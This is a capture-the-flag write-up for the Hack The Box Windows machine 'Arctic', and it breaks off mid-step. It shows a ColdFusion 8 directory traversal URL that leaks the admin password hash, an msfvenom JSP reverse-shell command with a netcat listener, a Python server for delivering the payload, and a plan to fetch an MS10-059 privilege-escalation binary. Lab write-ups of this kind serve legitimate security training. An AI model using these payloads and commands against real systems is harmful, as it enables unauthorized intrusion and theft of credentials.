Arctic Writeup
Introduction :
Arctic is an easy Windows box released back in March 2017.
Arctic is an easy Windows box released back in March 2017.
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions. The additional -Pn tells nmap that to skip the ping probes, because the box could be blocking them and because we know that the box is actually online.
λ ech0 [~/_HTB/Beep] → nmap 10.10.10.11 -sC -sV -Pn Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-09 21:58 CET Nmap scan report for 10.10.10.11 Host is up (0.033s latency). PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 8500/tcp open fmtp? 49154/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 133.85 seconds
We don't get that much to work with, but we will investigate the 8500th port for the next part.
Let's investigate the 8500th port by checking what lies at the following url : http://10.10.10.11:8500/
We'll test it by opening up our web browser, and using the curl command. Let's use the following syntax : curl -vsk http://10.10.10.11:8500
λ ech0 [ 127.0.0.1 ] [~] → curl --help -k, --insecure Allow insecure server connections when using SSL -s, --silent Silent mode -v, --verbose Make the operation more talkative
λ ech0 [ 127.0.0.1 ] [~] → curl -vsk http://10.10.10.11:8500/ * Trying 10.10.10.11:8500... * TCP_NODELAY set * Connected to 10.10.10.11 (10.10.10.11) port 8500 (#0) > GET / HTTP/1.1 > Host: 10.10.10.11:8500 > User-Agent: curl/7.66.0 > Accept: */* > * Mark bundle as not supporting multiuse * HTTP 1.0, assume close after body < HTTP/1.0 200 OK < Date: Tue, 12 Nov 2019 17:38:14 GMT < Content-Type: text/html; charset=utf-8 < Connection: close < Server: JRun Web Server < [Webpage Sourcecode [...]]
Now we know that 10.10.10.11 is running JRun Web Server at the port 8500. let's open it using our web browser to see what we can do there.
By opening up the aforementioned URL in our web browser, we navigate to a ColdFusion8 login page through the directories cfide/administrator. By doing a quick searchsploit command using the keyword Coldfusion, we see that the service may be vulnerable to Directory Traversal Attacks.
λ ech0 [ 127.0.0.1 ] [~] → searchsploit ColdFusion 8
--------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------- ----------------------------------------
Adobe ColdFusion - Directory Traversal (Metasploit) | exploits/multiple/remote/16985.rb
Adobe ColdFusion 2018 - Arbitrary File Upload | exploits/multiple/webapps/45979.txt
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cr | exploits/cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.c | exploits/cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query | exploits/cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?sta | exploits/cfm/webapps/33168.txt
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remo | exploits/windows/remote/43993.py
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | exploits/cfm/webapps/16788.rb
ColdFusion MX - Missing Template Cross-Site Scripting | exploits/cfm/remote/21548.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure | exploits/multiple/remote/22867.pl
--------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
By navigating to the exploit n°16985 on exploitdb, we see that we should be able to try a certain URL exploiting Coldfusion's assumed Directory Traversal Vulnerability. The URL to be tried is the following :
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../ColdFusion8/lib/password.properties%00en
You can see that this is indeed a Directory Traversal Vulnerability, because it is using the ../ special characters to change directory, going up the directory tree, in order to reach the root / directory. The difference with Local File Inclusion vulnerabilities, is that you have to use ../ to go up the directory tree. with LFI you could start with the root folder / and go down from there e.g : /etc/passwd The URL ends with a null byte ( %00 ) in order to end the string. For example: myCoolScript.php%00.txt - Meets .txt, but is going to execute .php for that matter, the "en" is there to meet the script's requirement but it ends right before that thanks to the null byte.
Although the RFI (Remote File Inclusion) Vulnerability would allow us much more flexibility in terms of exploiting vulnerable targets, they remain very rare, because it is very easy to make sure that there is no http in the include page.
(Special Thanks to Reelix for the technical details.)
The Directory Traversal Vulnerability was successful, now we have a Hash to work with. We will be using the hash-identifier command to identify the hash's encryption algorithm.
λ ech0 [ 127.0.0.1 ] [~] → hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
Paste the Hash into your favorite web-browser along with the SHA-1 keyword, and you should easily find the original "happyday" password.
We will now log into the ColdFusion8 Login form using our freshly-acquired credentials admin:happyday
Once on the coldfusion Dashboard, logged in as admin, we will upload a reverse shell tcp that we will generate using the msfvenom command, naming it as shell.jsp. The Scheduled task will download the shell.jsp payload , so we will need python to run the http server for us within a second terminal. We will upload it as a scheduled task, browse to it within our web browser, and catch the incoming reverse shell connection using the netcat command.
Terminal n°1:λ ech0 [ 10.10.14.48/23 ] [~/_HTB/Arctic] → msfvenom -p java/jsp_shell_reverse_tcp \ > LHOST=10.10.14.48 \ > LPORT=443 \ > -f raw > shell.jsp Payload size: 1496 bytes λ ech0 [ 10.10.14.48/23 ] [~/_HTB/Arctic] → su Password: λ root [ 10.10.14.48/23 ] [ech0/_HTB/Arctic] → nc -lvnp 443
Terminal n°2:
λ root [ 10.10.14.48/23 ] [ech0/_HTB/Arctic] → python -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.10.11 - - [11/Nov/2019 13:57:02] "GET /shell.jsp HTTP/1.1" 200 -
The box successfully downloaded our shell.jsp ! now we will browse to it , and observe our first terminal receieve the shell connection.
Terminal n°1:
λ root [ 10.10.14.48/23 ] [ech0/_HTB/Arctic] → nc -lvnp 443 ls Connection from 10.10.10.11:54438 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\ColdFusion8\runtime\bin>whoami whoami arctic\tolis
We now have a reverse shell, logged as the user tolis, we can now print out the user flag.
C:\ColdFusion8\runtime\bin>more C:\Users\tolis\Desktop\user.txt more C:\Users\tolis\Desktop\user.txt 02XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Now we need to escalate privileges onto the box. For that matter we can use a binary named "chimichurri.exe" which takes advantage of the vulnerability MS10-059 available on this machine, we can verify it by typing in the systeminfo command
C:\ColdFusion8\runtime\bin>systeminfo
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45 ��
System Boot Time: 12/11/2019, 1:11:38 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 370 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.281 MB
Virtual Memory: In Use: 766 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11
We see that this machine is vulnerable to the aforementionned binary exploit, because : -it is running Microsoft Windows Server 2008 R2 -There are no Hotfixes installed on the machine.
The lack of Hotfixes indicates a serious lack of security, which would allow an attacker (us) to escalate priveleges on the machine.
As it is detailed in this bulletin report, the hotfix KB982799 is required to fix the MS10-059 vulnerability
To be able to get chimmichurri.exe on this machine, we will need to write a ps1 script that will download the binary on our machine, serving a simple http server with python. to be able to execute our privesc binary we first need to check if we can write .ps1 files on the machine.
C:\ColdFusion8\runtime\bin>echo test >> xd.ps1 echo test >> xd.ps1 C:\ColdFusion8\runtime\bin>more xd.ps1 more xd.ps1 test
We have been able to put the line "test" into our ps1 file named xd.
Now we will make a file named wget.ps1 that will contain the lines required to download chimmichurri.exe from 10.10.14.48 (our local machine).
Terminal 1: